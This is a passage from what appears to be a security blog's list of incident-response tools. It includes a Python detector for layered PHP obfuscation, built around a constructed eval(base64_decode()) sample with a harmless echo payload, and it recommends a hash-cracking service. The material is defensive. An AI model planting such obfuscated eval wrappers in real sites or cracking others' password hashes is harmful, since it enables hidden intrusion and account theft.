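    return sorted(m for m in MARKERS if m in text)

def report(contents):
    """(depth, markers, text) for the file itself and each hidden layer."""
    layers = [contents] + decode_layers(contents)
    return [(i, suspicious_markers(t), t) for i, t in enumerate(layers)]

# Constructed sample of an injected PHP snippet (not real malware): a base64
# layer wrapping a URL-encoded layer around a harmless echo.
HIDDEN = 'echo "CONSTRUCTED HIDDEN CODE";'
_url = "".join("%%%02X" % b for b in HIDDEN.encode())
_b64 = base64.b64encode(f'eval(urldecode("{_url}"));'.encode()).decode()
SAMPLE_FILE = f'<?php /* theme footer */ eval(base64_decode("{_b64}")); ?>'

if __name__ == "__main__":
    for depth, marks, text in report(SAMPLE_FILE):
        print(f"layer {depth} markers={marks}: {text[:72]}")
```

Point `report()` at the contents of a suspect theme or plugin file; a file whose outer layer already shows `eval(` plus `base64_decode(` and whose decoded layers keep producing new markers is the pattern that the online decoders above help you confirm by hand.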

http://lombokcyber.com/en/detools/decode-sourcecop – Decode SourceCop v3.x
This is a tool that decodes a specific type of PHP encoding that may prove useful during a hacked site investigation.

Other tools

regex101 – Develop and test regular expressions.
Regex, or regular expressions, are pattern matching routines to find complex patterns in files and code. 

regexpal – Another site to develop and test regular expressions.
Both regex101 and regexpal provide online development environments to help you create or analyze regular expressions.

HashKiller – Online hash cracking service. Useful to reverse engineer hashes into passwords.
In most systems, passwords are stored as hashes. Malware authors occasionally use hashing to store their own passwords. In our research we have needed to crack hashes that are used by malware authors in order to read their source code. HashKiller can help reverse a hash into a password if you need to crack a hash as part of your malware analysis.

NoScript – NoScript is a Firefox extension that allows JavaScript, Java and Flash to only be executed by websites that you define and trust.
When visiting malicious websites, NoScript can help disable malicious code on that site. Note that you should always visit a malicious site that you are analyzing using a virtual machine that has no important data on it. If the VM gets infected, you can simply destroy it without worrying about important data being leaked. Using NoScript in your browser within your virtual environment can be useful when analyzing the function of a hacked site.

Other lists of tools

  • Awesome Forensics – A curated list of awesome free (mostly open source) forensic analysis tools and resources.

  • awesome-incident-response – A curated list of tools and resources for security incident response, aimed to help security analysts and DFIR teams.

  • OSINT Framework – OSINT is short for ‘open source intelligence’. This site provides a graphical directory of OSINT resources.

Kali Linux

Kali Linux is a Linux distribution that is the favorite of penetration testers and security analysts worldwide. It comes packed with security analysis tools. If you want to learn about cyber security, Kali should be one of your starting points. If you simply would like to know about some of the more important tools that Kali provides, you can use the list below.
Kali Linux Tools Listing – All the tools in Kali Linux, a Linux variant used by penetration testers and security analysts.

Conclusion

The tools on this page can help you respond to an incident, test the security of your own website and better understand how attackers think and what tools they have available to them. As always I welcome your feedback in the comments and you are most welcome to suggest your own favorite security or analysis tools.